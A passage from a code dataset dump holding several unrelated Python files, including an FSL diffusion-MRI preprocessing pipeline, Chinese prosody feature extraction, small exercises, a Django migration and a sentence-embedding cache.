NifTI file in the T1 directory\n if len(found_T1) == 0:\n found_T1 = glob(join(T1_dicom_tmp_dir, '*.nii.gz'))\n if len(found_T1) == 0:\n raise Exception('Did not find T1 output in {}'.format(T1_dicom_tmp_dir))\n elif len(found_T1) > 1:\n write(stdout, 'Warning: Found more than one T1 output in {}'.format(T1_dicom_tmp_dir))\n found_T1.sort()\n copyfile(found_T1[0], T1_file)\n\n # Copy extra 
b0 values to DTI temp dir\n for extra_b0_tmp_dir in extra_b0_tmp_dirs:\n for file in glob(join(extra_b0_tmp_dir, \"*.nii.gz\")):\n copyfile(file, join(DTI_dicom_tmp_dir, \"extra_b0_\" + basename(file)))\n write(stdout, 'Copied NiFTI outputs from {} to {}'.format(extra_b0_tmp_dir, DTI_dicom_tmp_dir))\n\n # Sort slices into DTI and b0\n for file in glob(join(DTI_dicom_tmp_dir, '*.nii.gz')):\n slice_val = run(\"fslmeants -i {} | head -n 1\".format(file), params) # based on getconnectome script\n all_slices[file] = float(slice_val)\n normal_median = np.median(list(all_slices.values()))\n for file in list(all_slices.keys()):\n slice_val = all_slices[file]\n # mark as b0 if more than 20% from normal slice median\n if abs(slice_val - normal_median) > 0.2 * normal_median:\n b0_slices[file] = slice_val\n else:\n normal_slices.append(file)\n if not b0_slices:\n raise Exception('Failed to find b0 values in {}'.format(DTI_dicom_dir))\n write(stdout, 'Found {} normal DTI slices'.format(len(normal_slices)))\n\n # Remove outliers from b0 values\n max_outliers = 1\n if len(b0_slices) > max_outliers:\n num_outliers = 0\n b0_median = np.median(list(b0_slices.values()))\n for file in list(b0_slices.keys()):\n slice_val = b0_slices[file]\n # remove outlier if more than 20% from b0 median\n if abs(slice_val - b0_median) > 0.2 * b0_median:\n b0_slices.pop(file)\n num_outliers += 1\n if num_outliers > max_outliers:\n raise Exception('Found more than {} outliers in b0 values. This probably means that this script has incorrectly identified b0 slices.'.format(max_outliers))\n write(stdout, 'Found {} b0 slices'.format(len(b0_slices)))\n\n # Average b0 slices into a single image\n avg_b0 = join(DTI_dicom_tmp_dir, 'avg_b0.nii.gz')\n smart_remove(avg_b0)\n for file in list(b0_slices.keys()):\n if not exists(avg_b0):\n copyfile(file, avg_b0)\n else:\n run(\"fslmaths {0} -add {1} {1}\".format(file, avg_b0), params)\n run(\"fslmaths {0} -div {1} {0}\".format(avg_b0, len(b0_slices)), params)\n\n # Concatenate average b0 and DTI slices into a single hardi.nii.gz\n normal_slices.sort()\n tmp_hardi = join(dicom_tmp_dir, \"hardi.nii.gz\")\n run(\"fslmerge -t {} {}\".format(tmp_hardi, \" \".join([avg_b0] + normal_slices)), params)\n copyfile(tmp_hardi, hardi_file)\n write(stdout, 'Concatenated b0 and DTI slices into {}'.format(hardi_file))\n\n # Clean extra zeroes from bvals and bvecs files\n num_slices = len(normal_slices)\n with open(bvals_file, 'r+') as f:\n entries = [x.strip() for x in f.read().split() if x]\n extra_zero = entries.pop(0) # strip leading zero\n if extra_zero != \"0\":\n raise Exception(\"{} should begin with zero, as a placeholder for the averaged b0 slice\".format(bvals_file))\n\n # remove zero sequences\n min_sequence_length = 5\n if all(x == \"0\" for x in entries[0:min_sequence_length]):\n write(stdout, \"Stripped leading zero sequence from {}\".format(bvals_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(0)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvals_file))\n elif all(x == \"0\" for x in entries[-1:-min_sequence_length-1:-1]):\n write(stdout, \"Stripped trailing zero sequence from {}\".format(bvals_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(-1)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvals_file))\n\n if len(entries) > num_slices:\n raise Exception('Failed to clean bvals file {}. 
Since {} has {} slices, bvals must have {} columns'.\n format(bvals_file, hardi_file, num_slices, num_slices))\n text = \"0 \" + \" \".join(entries) + \"\\n\" # restore leading zero\n f.seek(0)\n f.write(text)\n f.truncate()\n write(stdout, 'Generated bvals file with values:\\n{}'.format(text))\n with open(bvecs_file, 'r+') as f:\n text = \"\"\n for line in f.readlines():\n if not line:\n continue\n entries = [x.strip() for x in line.split() if x]\n extra_zero = entries.pop(0) # strip leading zero\n if extra_zero != \"0\":\n raise Exception(\"Each line in {} should begin with zero, as a placeholder for the averaged b0 slice\".format(bvecs_file))\n\n # remove zero sequences\n min_sequence_length = 5\n if all(x == \"0\" for x in entries[0:min_sequence_length]):\n write(stdout, \"Stripped leading zero sequence from {}\".format(bvecs_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(0)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvecs_file))\n elif all(x == \"0\" for x in entries[-1:-min_sequence_length-1:-1]):\n write(stdout, \"Stripped trailing zero sequence from {}\".format(bvecs_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(-1)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvecs_file))\n\n if len(entries) > num_slices:\n raise Exception('Failed to clean bvecs file {}. Since {} has {} slices, bvecs must have {} columns'.\n format(bvecs_file, hardi_file, num_slices, num_slices))\n text += \"0 \" + \" \".join(entries) + \"\\n\" # restore leading zero\n f.seek(0)\n f.write(text)\n f.truncate()\n write(stdout, 'Generated bvecs file with values:\\n{}'.format(text))\n\n # Compress DICOM inputs\n dicom_tmp_archive = join(bids_dicom_dir, 'sourcedata.tar.gz')\n smart_remove(dicom_tmp_archive)\n with tarfile.open(dicom_tmp_archive, mode='w:gz') as archive:\n archive.add(dicom_tmp_dir, recursive=True, arcname=basename(dicom_tmp_dir))\n smart_remove(dicom_tmp_dir)\n write(stdout, 'Compressed temporary DICOM files to {}'.format(dicom_tmp_archive))\n\n smart_copy(hardi_file, join(sdir, \"hardi.nii.gz\"))\n smart_copy(T1_file, join(sdir,\"T1.nii.gz\"))\n smart_copy(bvecs_file, join(sdir,\"bvecs\"))\n smart_copy(bvals_file, join(sdir,\"bvals\"))\n record_apptime(params, start_time, 1)\n\n### The following three functions parallelize FSL's \"eddy_correct\"\n@python_app(executors=['s1'], cache=True)\ndef s1_2_split_timeslices(params, inputs=[]):\n import time\n from subscripts.utilities import run,record_apptime,smart_remove,smart_copy\n from os.path import join\n from glob import glob\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n timeslices = glob(\"{}_tmp????.*\".format(output_prefix))\n for i in timeslices:\n smart_remove(i)\n for j in glob(\"{}_ref*\".format(output_prefix)):\n smart_remove(j)\n input_data = join(sdir, \"hardi.nii.gz\")\n output_prefix = join(sdir,\"data_eddy\")\n run(\"fslroi {} {}_ref 0 1\".format(input_data, output_prefix), params)\n run(\"fslsplit {} {}_tmp\".format(input_data, output_prefix), params)\n record_apptime(params, start_time, 2)\n\n@python_app(executors=['s1'], cache=True)\ndef s1_3_timeslice_process(params, worker_id, num_workers, inputs=[]):\n import time\n from subscripts.utilities import run,record_apptime\n from os.path import join,exists\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n 
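# Each worker handles a strided subset of timeslices: worker w processes\n    # slices w, w+num_workers, w+2*num_workers, ..., aligning each one to the\n    # data_eddy_ref volume produced by s1_2 with FSL flirt.\n    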
start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n timeslice = worker_id\n slice_data = join(sdir,\"data_eddy_tmp{:04d}.nii.gz\".format(timeslice))\n iteration = 0\n while exists(slice_data):\n # Break loop if it gets stuck\n if iteration > 99:\n break\n run(\"flirt -in {0} -ref {1}_ref -nosearch -interp trilinear -o {0} -paddingsize 1\".format(slice_data, output_prefix), params)\n # Example: worker #3 with 10 total workers will process timeslices 3, 13, 23, 33...\n timeslice += num_workers\n slice_data = join(sdir,\"data_eddy_tmp{:04d}.nii.gz\".format(timeslice))\n iteration += 1\n record_apptime(params, start_time, 3)\n\n@python_app(executors=['s1'], cache=True)\ndef s1_4_dti_fit(params, inputs=[]):\n import time\n from subscripts.utilities import run,smart_remove,record_apptime,record_finish,update_permissions\n from os.path import join,exists\n from shutil import copyfile\n from glob import glob\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n cores_per_task = params['cores_per_task']\n start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n output_data = join(sdir,\"data_eddy.nii.gz\")\n timeslices = glob(\"{}_tmp????.nii.gz\".format(output_prefix))\n timeslices.sort()\n bet = join(sdir,\"data_bet.nii.gz\")\n bvecs = join(sdir,\"bvecs\")\n bvals = join(sdir,\"bvals\")\n bet_mask = join(sdir,\"data_bet_mask.nii.gz\")\n dti_params = join(sdir,\"DTIparams\")\n dti_L1 = dti_params + \"_L1.nii.gz\"\n dti_L2 = dti_params + \"_L2.nii.gz\"\n dti_L3 = dti_params + \"_L3.nii.gz\"\n dti_MD = dti_params + \"_MD.nii.gz\"\n dti_RD = dti_params + \"_RD.nii.gz\"\n dti_MD = dti_params + \"_MD.nii.gz\"\n dti_AD = dti_params + \"_AD.nii.gz\"\n dti_FA = dti_params + \"_FA.nii.gz\"\n FA = join(sdir,\"FA.nii.gz\")\n run(\"fslmerge -t {} {}\".format(output_data, \" \".join(timeslices)), params)\n run(\"bet {} {} -m -f 0.3\".format(output_data,bet), params)\n run(\"dtifit --verbose -k {} -o {} -m {} -r {} -b {}\".format(output_data,dti_params,bet_mask,bvecs,bvals), params)\n run(\"fslmaths {} -add {} -add {} -div 3 {}\".format(dti_L1,dti_L2,dti_L3,dti_MD), params)\n run(\"fslmaths {} -add {} -div 2 {}\".format(dti_L2,dti_L3,dti_RD), params)\n copyfile(dti_L1,dti_AD)\n copyfile(dti_FA,FA)\n for i in glob(\"{}_tmp????.*\".format(output_prefix)):\n smart_remove(i)\n for j in glob(\"{}_ref*\".format(output_prefix)):\n smart_remove(j)\n update_permissions(params)\n record_apptime(params, start_time, 4)\n record_finish(params)\n\ndef setup_s1(params, inputs):\n stdout = params['stdout']\n container = params['container']\n sdir = params['sdir']\n # input_data = join(sdir, \"hardi.nii.gz\")\n # smart_copy(join(nifti_dir, \"hardi.nii.gz\"), input_data)\n # timeslices = run(\"fslinfo {} | sed -n -e '/^dim4/p'\".format(input_data), params).split()\n # if not timeslices or not is_integer(timeslices[-1]):\n # write(stdout, \"Failed to read timeslices from {}\".format(input_data))\n # return\n # num_timeslices = timeslices[-1]\n num_workers = 32\n s1_1_future = s1_1_dicom_preproc(params, inputs=inputs)\n s1_2_future = s1_2_split_timeslices(params, inputs=[s1_1_future])\n s1_3_futures = []\n for i in range(num_workers):\n s1_3_future = s1_3_timeslice_process(params, i, num_workers, inputs=[s1_2_future])\n s1_3_futures.append(s1_3_future)\n return s1_4_dti_fit(params, 
inputs=s1_3_futures)\n","repo_name":"markxiao/MaPPeRTrac","sub_path":"subscripts/s1_dti_preproc.py","file_name":"s1_dti_preproc.py","file_ext":"py","file_size_in_byte":17347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14986888292","text":"import os\nimport numpy as np\n\t\ndef get_pos_dic(pos_file):\n\tpos_dic = {}\n\twith open(pos_file) as f:\n\t\tcont = f.readlines()\n\t\tfor i in range(len(cont)):\n\t\t\tif i%4!=2:\n\t\t\t\tcontinue\n\t\t\tpos_l = cont[i].strip().split(\" \")\n\t\t\tpos_l.pop(-1)\n\t\t\tfor pos in pos_l:\n\t\t\t\tif pos not in pos_dic:\n\t\t\t\t\tpos_dic[pos] = len(pos_dic)+1\n\treturn pos_dic\n\ndef get_word_dic(word_file,vocab_size):\n\tw_dic = {}\n\twith open(word_file) as f:\n\t\tcont = f.readlines()\n\t\tfor i in range(len(cont)):\n\t\t\tif i%4!=1:\n\t\t\t\tcontinue\n\t\t\tw_l = cont[i].strip().split(\" \")\n\t\t\tw_l.pop(-1)\n\t\t\tw_l = \"\".join(w_l).decode(\"utf-8\")\n\t\t\tfor w in w_l:\n\t\t\t\tw = w.encode(\"utf-8\")\n\t\t\t\tif w not in w_dic:\n\t\t\t\t\tw_dic[w] = 0\n\t\t\t\tw_dic[w] += 1\n\tw_list = [[w,count] for w,count in w_dic.items()]\n\tw_list = sorted(w_list,key=lambda tup:tup[1],reverse=True)\n\tw_list = [tup[0] for tup in w_list]\n\tw_list = w_list[0:vocab_size]\n\tw_list.append(\"unk\")\n\tw_dic = {}\n\tfor w in w_list:\n\t\tw_dic[w] = len(w_dic)+1\n\treturn w_dic\n\ndef append_pos_to_feature(feat_dir,pos_file,pos_dic,word_dic):\n\t##read pos tag\n\tdata_dic = {}\n\n\twith open(pos_file) as f:\n\t\tsents = f.readlines()\n\t\trow = 0\n\t\twhile row < len(sents):\n\t\t\tdata_name = sents[row].strip()\n\t\t\trow += 1\n\t\t\ttoken = sents[row].strip().split(\" \")\n\t\t\trow += 1\n\t\t\tpos = sents[row].strip().split(\" \")\n\t\t\trow += 1\n\t\t\trow += 1\n\t\t\ttoken.pop(-1)##remove punctuation\n\t\t\tpos.pop(-1)##remove punctuation\n\t\t\tpos_list = []\n\t\t\tassert len(token)==len(pos)\n\t\t\tfor i in range(len(token)):\n\t\t\t\tfor j in range(len(token[i].decode(\"utf-8\"))):\n\t\t\t\t\tone_word = token[i].decode(\"utf-8\")[j]\n\n\t\t\t\t\ttmp_feat = []\n\n\t\t\t\t\t##current pos\n\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i]]))\n\n\t\t\t\t\t##previous pos\n\t\t\t\t\tif i==0:\n\t\t\t\t\t\ttmp_feat.append(\"0\")\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i-1]]))\n\n\t\t\t\t\t##next pos\n\t\t\t\t\tif i==len(token)-1:\n\t\t\t\t\t\ttmp_feat.append(\"0\")\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(pos_dic[pos[i+1]]))\n\n\t\t\t\t\t##pos tag position in utterance\n\t\t\t\t\ttmp_feat.append(str(i))\n\n\t\t\t\t\t##word position in pos tag\n\t\t\t\t\ttmp_feat.append(str(j))\n\n\t\t\t\t\t##chinese character(word) index\n\t\t\t\t\tif one_word.encode(\"utf-8\") not in word_dic:\n\t\t\t\t\t\ttmp_feat.append(str(word_dic[\"unk\"]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_feat.append(str(word_dic[one_word.encode(\"utf-8\")]))\n\n\t\t\t\t\tpos_list.append(tmp_feat)\n\t\t\t\t\t# pos_list.append([pos[i],i,j])##i=pos tag postion in utterance, j=word postion in its pos tag\n\t\t\tdata_dic[data_name] = pos_list\n\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [tmp_name for tmp_name in file_list if \"data\" in tmp_name]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor file_name in file_list:\n\t\tpos = data_dic[file_name.split(\".\")[0]]\n\t\tfile_sents = None\n\t\twith open(feat_dir+\"/\"+file_name) as f:\n\t\t\tfile_sents = f.readlines()\n\t\t# print(pos)\n\t\t# 
print(file_sents)\n\t\tassert len(file_sents)==len(pos),file_name\n\t\t# file_sents = [file_sents[i].strip()+\" \"+str(pos_dic[pos[i][0]])+\" \"+str(pos[i][1])+\" \"+str(pos[i][2])+\"\\n\" for i in range(len(file_sents))]\n\t\tfile_sents = [file_sents[i].strip()+\" \"+\" \".join(pos[i])+\"\\n\" for i in range(len(file_sents))]\n\t\twith open(feat_dir+\"/\"+file_name,\"w+\") as f:\n\t\t\tf.writelines(file_sents)\n\n\t# print(\"append 5 pos features: pos tag, pre pos tag, next pos tag, pos position in utterance, word position in pos\")\n\tprint(\"pos features \"+str(feature_before)+\" \"+str(feature_before+6-1))\n\treturn\n\n\ndef get_syl_dic(consonant_vowel_file):\n\tc_dic = {}\n\tv_dic = {}\n\twith open(consonant_vowel_file) as f:\n\t\tline = f.readline().strip().split(\" \")\n\t\tfor c in line:\n\t\t\tc_dic[c] = len(c_dic)\n\n\t\tline = f.readline().strip().split(\" \")\n\t\tfor v in line:\n\t\t\tv_dic[v] = len(v_dic)\n\treturn c_dic,v_dic\n\ndef decompose_zh_syl(syl_l,c_dic,v_dic):\n\tresult = []\n\tfor syl in syl_l:\n\t\tif syl in v_dic:\n\t\t\tresult.append([0,v_dic[syl]])\n\t\telse:\n\t\t\tp = 0\n\t\t\twhile syl[0:p+1] in c_dic:\n\t\t\t\tp += 1\n\t\t\t# print(syl[0:p]+\" \"+syl[p:])\n\t\t\tresult.append([c_dic[syl[0:p]],v_dic[syl[p:]]])\n\tresult = np.array(result).astype(np.int32)\n\treturn result\n\ndef append_syl_to_feature(feat_dir,txt_done_data,c_dic,v_dic):\n\tdata = {}\n\twith open(txt_done_data) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip().split(\" \")\n\t\t\tdata_name = line[1]\n\t\t\tsyl_list = line[3:-2]\n\t\t\tdata[data_name] = []\n\t\t\tfor syl in syl_list:\n\t\t\t\tdata[data_name].append(syl[0:-1])\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [file for file in file_list if \"data\" in file]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor data_name in file_list:\n\t\tif \"data\" not in data_name:\n\t\t\tcontinue\n\t\tsyl_l = data[data_name.split(\".\")[0]]\n\t\tcvl = decompose_zh_syl(syl_l,c_dic,v_dic)\n\t\tfeat_cont = None\n\t\twith open(feat_dir+\"/\"+data_name) as f:\n\t\t\tfeat_cont = f.readlines()\n\t\tfeat_cont = [line.strip() for line in feat_cont]\n\t\tassert len(feat_cont)==len(cvl)\n\t\twith open(feat_dir+\"/\"+data_name,\"w+\") as f:\n\t\t\tfor i in range(len(feat_cont)):\n\t\t\t\tfeat_cont[i] = feat_cont[i]+\" \"+str(cvl[i][0])+\" \"+str(cvl[i][1])+\"\\n\"\n\t\t\tf.writelines(feat_cont)\n\tprint(\"syllable features \"+str(feature_before)+\" \"+str(feature_before+2-1))\n\n\ndef append_phrase_to_feature(feat_dir,phrase_syl_dir):\n\tfile_list = os.listdir(feat_dir)\n\tfile_list = [file for file in file_list if \"data\" in file]\n\n\tfeature_before = 0\n\twith open(feat_dir+\"/\"+file_list[0]) as f:\n\t\tfeature_before = len(f.readline().strip().split(\" \"))\n\n\tfor file in file_list:\n\t\tif \"data\" not in file:\n\t\t\tcontinue\n\t\twith open(phrase_syl_dir+\"/\"+file.split(\".\")[0]) as f:\n\t\t\tutt = f.readlines()\n\t\t\tfor i in range(len(utt)):\n\t\t\t\tutt[i] = utt[i].strip().split(\" \")\n\n\t\t\tphrase_feat = []\n\t\t\tfor i in range(len(utt)):\n\t\t\t\tphrase = utt[i]\n\t\t\t\tfor j in range(len(phrase)):\n\t\t\t\t\tword_feat = []\n\t\t\t\t\t#phrase position in utt\n\t\t\t\t\tword_feat.append(i)\n\n\t\t\t\t\t#phrase percent in utt\n\t\t\t\t\tword_feat.append(float(i)/len(utt))\n\n\t\t\t\t\t#phrase number in utt\n\t\t\t\t\tword_feat.append(len(utt))\n\n\t\t\t\t\t#syllable position in phrase\n\t\t\t\t\tword_feat.append(j)\n\n\t\t\t\t\t#syllable 
percent in phrase\n\t\t\t\t\tword_feat.append(float(j)/len(phrase))\n\n\t\t\t\t\t#syllable number in phrase\n\t\t\t\t\tword_feat.append(len(phrase))\n\n\t\t\t\t\tphrase_feat.append(word_feat)\n\t\t\tphrase_feat = np.array(phrase_feat)\n\n\t\t\tori_feat = None\n\t\t\twith open(feat_dir+\"/\"+file) as featf:\n\t\t\t\tori_feat = featf.readlines()\n\t\t\t\tassert len(phrase_feat)==len(ori_feat),file+\": \"+str(len(phrase_feat))+\" doesn't equal to \"+str(len(ori_feat))\n\t\t\twith open(feat_dir+\"/\"+file,\"w+\") as outf:\n\t\t\t\tfor i in range(len(ori_feat)):\n\t\t\t\t\toutf.write(ori_feat[i].strip()+\" \"+\" \".join(phrase_feat[i].astype(np.str).tolist())+\"\\n\")\n\t# print(\"append 6 phrase features\")\n\tprint(\"phrase features \"+str(feature_before)+\" \"+str(feature_before+6-1))\n\ndef load_dic(file):\n\tdic = {}\n\twith open(file) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip().split(\" \")\n\t\t\tdic[line[0]] = int(line[1])\n\treturn dic\n\ndef save_dic(dic,out_file):\n\twith open(out_file,\"w+\") as f:\n\t\tfor key,idx in dic.items():\n\t\t\tf.write(str(key)+\" \"+str(idx)+\"\\n\")","repo_name":"WDongYuan/cantonese_f0_generation","sub_path":"seq_op/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
+{"seq_id":"37902573188","text":"import sys\n# Write a Python program to test whether all numbers of a list are greater than a certain number.\nliss = [4, 5, 1, 2, 3, 9]\nLa = 8\ns = 0\nfor n in liss:\n    # count the values that fail the test, iterating over the values themselves\n    if n <= La:\n        s += 1\nif s > 0:\n    print(\"not all numbers of the list are greater than 8\")\nelse:\n    print(\"all numbers of the list are greater than 8\")\n","repo_name":"sevilaybayatli/PYTHS19","sub_path":"Ex75.py","file_name":"Ex75.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"69851074536","text":"temperaturas = []\n\nfor i in range(1, 6):\n    print(f\"Temperaturas del día {i}:\")\n    tmax = float(input(\"Temperatura máxima: \"))\n    tmin = float(input(\"Temperatura mínima: \"))\n    temperaturas.append((tmax, tmin))\n\ntemperaturas_medias = []\nfor tmax, tmin in temperaturas:\n    temperatura_media = (tmax + tmin) / 2\n    temperaturas_medias.append(temperatura_media)\n\nfor i, temperatura_media in enumerate(temperaturas_medias):\n    print(f\"La temperatura media del día {i+1} fue: {temperatura_media:.2f}\")\n\n\ntemperaturas_minimas = [tmin for _, tmin in temperaturas]\nminima_temperatura = min(temperaturas_minimas)\ndias_con_menos_temperatura = [i+1 for i, tmin in enumerate(temperaturas_minimas) if tmin == minima_temperatura]\nprint(f\"Los días con menos temperatura fueron: {dias_con_menos_temperatura}\")\n\ntemperatura_busqueda = float(input(\"Introduce una temperatura máxima a buscar: \"))\ndias_con_temperatura_busqueda = [i+1 for i, (tmax, _) in enumerate(temperaturas) if tmax == temperatura_busqueda]\nif dias_con_temperatura_busqueda:\n    print(f\"Los días con temperatura máxima {temperatura_busqueda} fueron: {dias_con_temperatura_busqueda}\")\nelse:\n    print(f\"No se encontraron días con temperatura máxima {temperatura_busqueda}.\")\n","repo_name":"patoflyer/python_proyect_one","sub_path":"ejercicios grisc15 y AithusaTm/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"15731367158","text":"\nimport asyncio\nfrom typing import Coroutine, 
Generator\nimport aioconsole\n\n\n# Generator - almost coroutine\ndef first() -> Generator:\n n = 0\n while True:\n yield n\n n += 1\n\n# First coroutine\ndef second() -> Generator:\n list_: list = []\n while True:\n n = (yield list_)\n list_.append(n)\n\n# Coroutine with asyncio\nasync def third() -> Coroutine:\n list_: list = []\n while True:\n n = (await aioconsole.ainput())\n await aioconsole.aprint(list_)\n list_.append(n)\n\n\nif __name__ == \"__main__\":\n \n # Launch generator\n gen: Generator = first()\n print(next(gen))\n print(next(gen))\n print(next(gen))\n\n print()\n\n # Launch coroutine\n cor: Generator = second()\n next(cor)\n print(cor.send(1))\n print(cor.send(2))\n print(cor.send(3))\n\n print()\n\n # Launch coroutine with asyncio\n asyncio.run(third())","repo_name":"UAcapitan/code","sub_path":"experiments/e10_coroutines.py","file_name":"e10_coroutines.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17594719550","text":"# encoding: utf-8\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n\n db.execute(\"CREATE EXTENSION IF NOT EXISTS intarray\")\n\n # Adding field 'CardFtsIndex.cmc'\n db.add_column('forge_cardftsindex', 'cmc', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)\n\n # Adding field 'CardFtsIndex.color_identity'\n db.add_column('forge_cardftsindex', 'color_identity', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)\n\n db.execute(\"ALTER TABLE forge_cardftsindex ADD COLUMN sets int[]\")\n db.execute(\"\"\"\n CREATE INDEX forge_cardftsindex_sets_idx\n ON forge_cardftsindex\n USING GIST (sets gist__int_ops)\n \"\"\")\n\n\n def backwards(self, orm):\n\n # Deleting field 'CardFtsIndex.cmc'\n db.delete_column('forge_cardftsindex', 'cmc')\n\n # Deleting field 'CardFtsIndex.color_identity'\n db.delete_column('forge_cardftsindex', 'color_identity')\n\n\n models = {\n 'forge.cardftsindex': {\n 'Meta': {'object_name': 'CardFtsIndex'},\n 'card': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'fts'\", 'to': \"orm['oracle.Card']\"}),\n 'cmc': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),\n 'color_identity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n 'oracle.card': {\n 'Meta': {'object_name': 'Card'},\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'name': ('contrib.fields.NullCharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})\n }\n }\n\n complete_apps = ['forge']\n","repo_name":"satyrius/mtgforge","sub_path":"backend/forge/migrations/0002_auto__add_field_cardftsindex_cmc__add_field_cardftsindex_color_identit.py","file_name":"0002_auto__add_field_cardftsindex_cmc__add_field_cardftsindex_color_identit.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24991662635","text":"import enum\nimport const\nimport os\nimport pickle\nimport datetime\nimport numpy as np\n\n\nclass EmbeddingSet:\n def __init__(self, model, languages=('C', 'Java', 'Python', 'SQL', 'Natrual', 'Other'), dump_seconds = 10):\n self.model = model\n self.cache_name = '{}_EmbeddingSet.pkl'.format(self.model.model_name)\n 
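# Append-only CSV logs of every add/delete request; presumably kept so the\n        # pickled embedding cache can be audited or replayed if it is lost (an\n        # assumption -- the original code does not state their purpose).\n        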
self.add_filename = 'QuestionAddFile.csv'\n self.delete_filename = 'QuestionDeleteFile.csv'\n\n if self.cache_name in os.listdir(const.CACHE_PATH):\n with open(os.path.join(const.CACHE_PATH, self.cache_name), 'rb') as f:\n self.data = pickle.load(f)\n for language in languages:\n if language not in self.data:\n self.data[language] = [[], []]\n else:\n self.data = dict([[language, [[], []]] for language in languages])\n self.data['prompts'] = dict()\n \n self.dump_seconds = dump_seconds\n self.last_dump_time = datetime.datetime.now()\n \n def dump(self):\n with open(os.path.join(const.CACHE_PATH, self.cache_name), 'wb') as f:\n pickle.dump(self.data, f)\n return dict([(language, len(self.data[language][0])) \\\n for language in self.data if language != 'prompts'])\n \n def add(self, language, qid, question):\n if language not in self.data:\n return False\n with open(os.path.join(const.CACHE_PATH, self.add_filename), 'a', encoding='utf8') as f:\n f.write('{},{},{}\\n'.format(language, qid, question))\n self.data[language][0].append(qid)\n self.data[language][1].append(self.model.embedding(question))\n self._update()\n return self.data[language][1][-1]\n\n \n def delete(self, qid):\n flag = False\n for language, records in self.data.items():\n if language == 'prompts':\n continue\n del_positions = list()\n for i, temp_qid in enumerate(records[0]):\n if qid == temp_qid:\n flag = True\n del_positions.append(i)\n for i, position in enumerate(del_positions):\n records[0].pop(position - i)\n records[1].pop(position - i)\n if flag:\n with open(os.path.join(const.CACHE_PATH, self.delete_filename), 'a', encoding='utf8') as f:\n f.write('{}\\n'.format(qid))\n self._update()\n return flag\n\n def checkqids(self, qids):\n to_be_checked = set(qids)\n for language, records in self.data.items():\n if language != 'prompts':\n for qid in records[0]:\n if len(to_be_checked) == 0:\n break\n if qid in to_be_checked:\n to_be_checked.remove(qid)\n return list(to_be_checked)\n\n\n def get_prompts_embedding(self, prompts):\n ret = False\n if len(prompts) == 0:\n return False\n for prompt in prompts:\n if prompt not in self.data['prompts']:\n self.data['prompts'][prompt] = self.model.embedding(prompt)\n if ret is False:\n ret = self.data['prompts'][prompt]\n else:\n ret = np.concatenate([ret, self.data['prompts'][prompt]], axis=0)\n self._update()\n return ret\n \n def get_languages_records(self, languages):\n ret = False\n for language in languages:\n if language == 'prompts' or language not in self.data:\n return False\n if ret == False:\n ret = [[], []]\n record = self.data[language]\n ret[0] += record[0]\n ret[1] += record[1]\n if not ret == False:\n ret[1] = np.concatenate(ret[1], axis=0)\n self._update()\n return ret\n\n def _update(self):\n present = datetime.datetime.now()\n if (present - self.last_dump_time).seconds > self.dump_seconds:\n self.dump()\n self.last_dump_time = present\n","repo_name":"8igfive/AIApe","sub_path":"BackEnd/SentenceEmbedding/EmbeddingSet.py","file_name":"EmbeddingSet.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"33139473506","text":"import sys\n\nfrom PyQt6 import QtGui, QtWidgets, QtCore\nfrom PyQt6 import uic\nfrom PyQt6.QtCore import (QPoint, QRect,\n QTimer, QUrl)\nfrom PyQt6.QtCore import QPointF, QRectF\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import 